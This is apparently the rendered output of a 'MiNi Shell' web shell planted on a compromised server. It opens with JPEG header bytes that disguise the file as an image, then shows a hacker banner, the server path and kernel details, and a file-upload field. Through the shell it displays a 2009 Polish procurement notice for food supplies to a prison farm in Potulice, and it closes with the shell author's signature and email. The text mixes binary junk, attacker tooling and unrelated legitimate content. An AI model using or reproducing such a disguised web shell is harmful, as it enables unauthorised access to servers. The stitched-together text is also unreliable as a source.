JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/2372-N-2009.html

<p class="kh_header"><b>Potulice: Dostawy przypraw, innych art. spożywczych oraz makaronu i produktów sypkich (znak sprawy 2/2009)</b><br>
<b>Numer ogłoszenia: 2372 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze Administracji Budynków Mieszkalnych przy Zakładzie Karnym , ul. Bydgoska 1, 89-120 Potulice, woj. kujawsko-pomorskie, tel. 0-52 3864168, faks 0-52 3864168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nie dotyczy</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gospodarstwo Pomocnicze.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy przypraw, innych art. spożywczych oraz makaronu i produktów sypkich (znak sprawy 2/2009).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie dotyczy dostaw przypraw, innych art. spożywczych oraz makaronu i produktów sypkich, które zostało podzielone na 3 części (grupy).
2.	Zamawiający informuje, że ilości szacunkowe artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
3.	Oferowane artykuły mają być w zamkniętych i nieuszkodzonych opakowaniach.
4.	Zamawiający dopuszcza możliwość dostaw artykułów w opakowaniu o większej gramaturze/litrażu/ilości sztuk np. tabletek (tzw. promocja) niż określone w rozdziale III siwz (dotyczy okresu realizacji zamówienia na podstawie umowy).
5.	Zamawiający dopuszcza składanie ofert równoważnych, tzn. artykułów o innych nazwach handlowych niż określone w niniejszej siwz, pod warunkiem, że będą posiadały parametry, w szczególności dotyczące smaku i aromatu nie gorsze niż artykuły opisane i wymienione przez zamawiającego. Na wykonawcy ciąży udowodnienie, że równoważny artykuł nie jest gorszy od określonego przez zamawiającego. W przypadku oferowania artykułów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 2 do siwz, tj. formularz dotyczący porównania parametrów artykułów.
6.	Termin ważności dostarczanych artykułów, minimum 6 miesięcy, liczony od dnia dostawy. Dostawa artykułów z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
7.	Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1)	Wykonawca dostarczać będzie artykuły do magazynu Zamawiającego zlokalizowanego na terenie Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1.
2)	Wykonawca dostarczać będzie artykuły własnym transportem, na swój koszt, w sposób zapobiegający utracie walorów smakowych i odżywczych.
3)	Dostarczane artykuły sypkie mają być niezbrylone.
4)	Opakowania muszą posiadać nadrukowany kod kreskowy oraz nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz gramaturze lub litrażu, lub ilości j.m. (np. sztuk).
5)	Realizacja dostaw w uzgodnionych terminach, w godzinach 8:00 - 12:00.
6)	Termin płatności 30 dni, forma płatności przelew..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1, 15.87.00.00-7, 15.83.12.00-4, 15.87.12.30-5, 15.87.12.73-8, 15.87.12.50-1, 15.61.33.80-5, 15.61.33.11-1, 15.33.22.40-8, 15.85.11.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
1.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2.	Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu, na podstawie złożonych dokumentów oraz oświadczeń wyszczególnionych w rozdziale IX siwz.
3.	Jeżeli Wykonawca nie złoży dokumentów lub oświadczeń (wyszczególnionych w rozdziale IX siwz) potwierdzających spełnienie warunków udziału w postępowaniu, albo wykonawca złoży dokumenty zawierające błędy, zamawiający wezwie wykonawcę z zastrzeżeniem art. 26 ust. 3 ustawy Pzp do ich uzupełnienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, wykonawca składa następujące dokumenty:
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.	Wykonawca do oferty składa podpisane oświadczenie, o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy Pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gospodarstwo Pomocnicze przy Zakładzie Karnym w Potulicach, ul. Bydgoska 1, 89-120 Potulice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 11:00, miejsce: w biurze zamawiającego, przy ul. Bydgoskiej 1 w Potulicach.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> grupa 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1)	Sól biała warzona jodowana spożywcza w opakowaniu 1kg, ilość szacunkowa 440 opakowań. CPV: 15872400-5.
1.2)	Cukier biały w opakowaniu 1kg, ilość szacunkowa 3000 opakowań. CPV: 15831200-4.
1.3)	Cukier waniliowy w opakowaniu 15g-20g, ilość szacunkowa 400 opakowań. CPV: 15831000-2.
1.4)	Słodzik, 250-350 tabletek w opakowaniu - automat, tabletka o masie 50-60mg, ilość szacunkowa 640 opakowań. CPV: 15830000-5.
1.5)	Słodzik, 1100-1300 tabletek w opakowaniu - automat, tabletka o masie 50-60mg, ilość szacunkowa 720 opakowań. CPV: 15830000-5.
1.6)	Pieprz czarny mielony w opakowaniu 15g-20g, ilość szacunkowa 1000 opakowań. CPV: 15872100-2.
1.7)	Papryka ostra mielona w opakowaniu 20g-30g, ilość szacunkowa 900 opakowań. CPV: 15870000-7.
1.8)	Papryka słodka mielona w opakowaniu 20g-30g, ilość szacunkowa 130 opakowań. CPV: 15870000-7.
1.9)	Liść laurowy w opakowaniu 20-30g, ilość szacunkowa 150 opakowań. CPV: 15870000-7.
1.10)	Przyprawa Vegeta Podravka w opakowaniu 75g, ilość szacunkowa 600 opakowań. Skład m.in.: sól kuchenna, suszone warzywa-15,5% (w tym: marchew, pasternak, cebula, seler, natka pietruszki). CPV: 15870000-7.
1.11)	Przyprawa do potraw Warzywko uniwersalne - smak świeżych warzyw w opakowaniu 75g, ilość szacunkowa 600 opakowań. Skład m.in.: sól, warzywa suszone-15,1% (w tym: marchew, cebula, pasternak, liście selera, natka pietruszki, czosnek, papryka, pomidory). CPV: 15870000-7.
1.12)	Czosnek granulowany w opakowaniu 20g-30g, ilość szacunkowa 880 opakowań. CPV: 15870000-7.
1.13)	Majeranek w opakowaniu 20g-30g, ilość szacunkowa 340 opakowań. CPV: 15870000-7.
1.14)	Oregano w opakowaniu 10g-20g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
1.15)	Liście bazylii w opakowaniu 10g-20g, ilość szacunkowa 180 opakowań. CPV: 15870000-7.
1.16)	Cynamon mielony w opakowaniu 20g-30g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
1.17)	Koperek w opakowaniu 8g-15g, ilość szacunkowa 400 opakowań. CPV: 15870000-7.
1.18)	Susz z liści pietruszki w opakowaniu 10g-20g, ilość szacunkowa 400 opakowań. CPV: 15870000-7.
1.19)	Chili w opakowaniu 20g-30g, ilość szacunkowa 120 opakowań. CPV: 15870000-7.
1.20)	Przyprawa do zup, sosów, sałatek w płynie Winiary 210g, ilość szacunkowa 180 opakowań. CPV: 15870000-7.
1.21)	Przyprawa kucharek w opakowaniu 1 kg, ilość szacunkowa 26 opakowań. CPV: 15870000-7.
1.22)	Kwasek cytrynowy do celów spożywczych w opakowaniu 20g-30g, ilość szacunkowa 2550 opakowań. CPV: 15880000-0.
1.23)	Soda oczyszczona do celów spożywczych w opakowaniu 75g-85g, ilość szacunkowa 240 opakowań. CPV: 15880000-0.
1.24)	Zaprawa cytrynowa w opakowaniu 200 ml, ilość szacunkowa 120 opakowań. CPV: 15880000-0.
1.25)	Włocławek koncentrat pomidorowy 30% w opakowaniu 0,9 litr - 1 litr (0,9kg-1kg), ilość szacunkowa 156 opakowań. CPV: 15331427-6.
1.26)	Włocławek ketchup łagodny w opakowaniu 0,9 litr - 1 litr (0,9kg-1kg), ilość szacunkowa 156 opakowań. CPV: 15871230-5.
1.27)	Włocławek ketchup pikantny w opakowaniu 480g, ilość szacunkowa 1100 opakowań. CPV: 15871230-5.
1.28)	Ketchup pikantny Pudliszki w opakowaniu 480g, ilość szacunkowa 1100 opakowań. Skład m.in.: pomidory 183g na 100g ketchupu. CPV: 15871230-5.
1.29)	Ketchup pikantny w opakowaniu 400g-500g, ilość szacunkowa 1800 opakowań. CPV: 15871230-5.
1.30)	Majonez pomorski stołowy Ocetix w opakowaniu (słoik) 260g, ilość szacunkowa 1800 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
1.31)	Majonez dekoracyjny Winiary w opakowaniu (słoik) 400ml, ilość szacunkowa 300 opakowań. Skład m.in.: olej roślinny, żółtko jaj-6%, ocet, musztarda, cukier, sól. Średnia zawartość odżywcza w 100ml produktu: tłuszcz 76,1g. CPV: 15871273-8.
1.32)	Musztarda stołowa w opakowaniu 180g-220g, ilość szacunkowa 310 opakowań. CPV: 15871250-1.
1.33)	Musztarda sarepska w opakowaniu 450g-550g, ilość szacunkowa 1800 opakowań. CPV: 15871250-1.
1.34)	Musztarda sarepska Ocetix w opakowaniu (słoik) 200g, ilość szacunkowa 900 opakowań. CPV: 15871250-1.
1.35)	Chrzan tarty w opakowaniu (słoik) 170g-200g, ilość szacunkowa 450 opakowań. CPV: 15870000-7.
1.36)	Chrzan łowicki naturalny Urbanek w opakowaniu (słoik) 180g, ilość szacunkowa 900 opakowań. CPV: 15870000-7..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.00.00-7, 15.83.12.00-4, 15.87.12.30-5, 15.87.12.73-8, 15.87.12.50-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> grupa 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1)	Tabletki musujące, 20 tabletek w opakowaniu 80g-90g, ilość szacunkowa 2900 opakowań, różne smaki, w tym: multi witaminy, magnez, wapno (calcium), witamina C. 1 tabletka na 1 szklankę wody. CPV: 15894000-1.
1.2)	Krem do smarowania z orzechami laskowymi Nutella w opakowaniu 200g-220g, ilość szacunkowa 480 opakowań. Skład m.in.: cukier, olej roślinny, orzechy laskowe-13%, odtłuszczone kakao-7,4%, odtłuszczone mleko w proszku-5%, serwatka w proszku. CPV: 15840000-8.
1.3)	Miód pszczeli w opakowaniu (słoik) 200g-250g, ilość szacunkowa 430 opakowań. CPV: 15831600-8.
1.4)	Płatki owsiane zwykłe Halina w opakowaniu 400g, ilość szacunkowa 30000 opakowań. Składniki odżywcze w 100g: wartość energetyczna 366kcal (1530kJ), białko 11,90g, węglowodany przyswajalne 62,40g, tłuszcz całkowity 7,20g. Produkt zawiera gluten. CPV: 15613380-5.
1.5)	Płatki kukurydziane Corn Flakes Nestle w opakowaniu 500g, ilość szacunkowa 600 opakowań. skład m.in.: kukurydza 98%, cukier, sól, glukoza, substancje wzbogacające w tym: niacyna, kwas pantotenowy, kwas foliowy, żelazo zredukowane, witamina C, B1, B2, B6, B12. CPV: 15613311-1.
1.6)	Ziarna pszenicy w polewie miodowej 450g-550g, ilość szacunkowa 300 opakowań. CPV: 15613319-7.
1.7)	Zbożowe kuleczki o smaku czekoladowym Nesquik Nestle w opakowaniu 250g, ilość szacunkowa 300 opakowań. Skład m.in.: mąka pszenna pełnoziarnista 32,2%, mąka kukurydziana, mąka ryżowa, cukier, kakao-5%, glukoza, olej palmowy, sól, kakao niskotłuszczowe 0,5%. CPV: 15613310-4.
1.8)	Płatki kukurydziane o smaku czekoladowym w opakowaniu 450g-550g, ilość szacunkowa 300 opakowań. CPV: 15613311-1.
1.9)	Kuskus uniwersalna kasza z pszenicy bez gotowania Halina w opakowaniu 250g, ilość szacunkowa 480 opakowań. Produkt zawiera gluten. Skład: semolina z pszenicy twardej. Przeciętna zawartość składników odżywczych w 100g: wartość energetyczna 1557 kJ (336kcal), białko ogółem 12,76g, węglowodany 77,43g, tłuszcze 0,64g. CPV: 15851250-5.
1.10)	Kaszka mleczno-ryżowa na mleku modyfikowanym BoboVita o różnych smakach, w opakowaniu 230g, ilość szacunkowa 180 opakowań. Produkt bezglutenowy. CPV: 15884000-8.
1.11)	Śnieżka kremowa śmietanka błyskawiczna light Cykoria, przyrządzana na wodzie, w opakowaniu 60g, ilość szacunkowa 1800 opakowań. CPV: 15894000-1.
1.12)	Budyń waniliowy w opakowaniu 35g-45g, ilość szacunkowa 3600 opakowań. CPV: 15620000-0.
1.13)	Słodka chwila Dr.Oetker budyń o smaku waniliowym i czekoladowym, w opakowaniu 43g, ilość szacunkowa 300 opakowań. CPV: 15620000-0.
1.14)	Słodka chwila Dr.Oetker kisiel o smaku truskawkowym i wiśniowym z witaminą C, w opakowaniu 30g, ilość szacunkowa 300 opakowań. CPV: 15620000-0.
1.15)	Kisiel - różne smaki, w tym: truskawkowy, wiśniowy, agrestowy, cytrynowy, pomarańczowy, w opakowaniu 35g-45g, ilość szacunkowa 6000 opakowań. CPV: 15620000-0.
1.16)	Galaretka spożywcza - różne smaki, w opakowaniu 90g-100g, ilość szacunkowa 6000 opakowań. CPV: 15332240-8.
1.17)	Zabielacz do kawy i herbaty Cremona śmietankowa classic w opakowaniu 200g, ilość szacunkowa 540 opakowań. Skład m.in.: syrop glukozowy, utwardzony tłuszcz roślinny 32,5%, białko mleka. CPV: 15894000-1..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.40.00-1, 15.61.33.80-5, 15.61.33.11-1, 15.33.22.40-8, 15.62.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> grupa 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1)	Makaron - świderki, z maki pszennej, w opakowaniu 400g-500g, ilość szacunkowa 30000 opakowań. CPV: 15851100-9.
1.2)	Makaron Lubella świderki - nr 19 (Eliche) w opakowaniu 500g, ilość szacunkowa 900 opakowań. Skład m.in.: mąka makaronowa pszenna, substancje wzbogacające - wit. A. Wartość odżywcza dla 100g produktu: wartość energetyczna 1429 kJ (336 kcal), białko 13,5g, węglowodany przyswajalne 69,9g, cukry proste i dwucukry 10,2g, tłuszcz całkowity 0,3g, błonnik pokarmowy 3,9g, sód 0g, witamina A - 120ug. CPV: 15851100-9.
1.3)	Makaron - świderki, z maki pszennej, w opakowaniu 5kg, ilość szacunkowa 26 opakowań. CPV: 15851100-9.
1.4)	Mąka wrocławska w opakowaniu 1kg, ilość szacunkowa 310 opakowań. CPV: 15612100-2.
1.5)	Mąka ziemniaczana (skrobia ziemniaczana) w opakowaniu 500g, ilość szacunkowa 100 opakowań. CPV: 15620000-0.
1.6)	Ryż długoziarnisty w opakowaniu 1kg, ilość szacunkowa 130 opakowań. CPV: 15614100-6.
1.7)	Kasza gryczana prażona w opakowaniu 400g (4 saszetki po 100g), ilość szacunkowa 80 opakowań. CPV: 15613000-8.
1.8)	Kasza jęczmienna w opakowaniu 400g (4 saszetki po 100g), ilość szacunkowa 30 opakowań. CPV: 15613000-8..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9, 15.61.21.00-2, 15.62.00.00-0, 15.61.41.00-6, 15.61.30.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com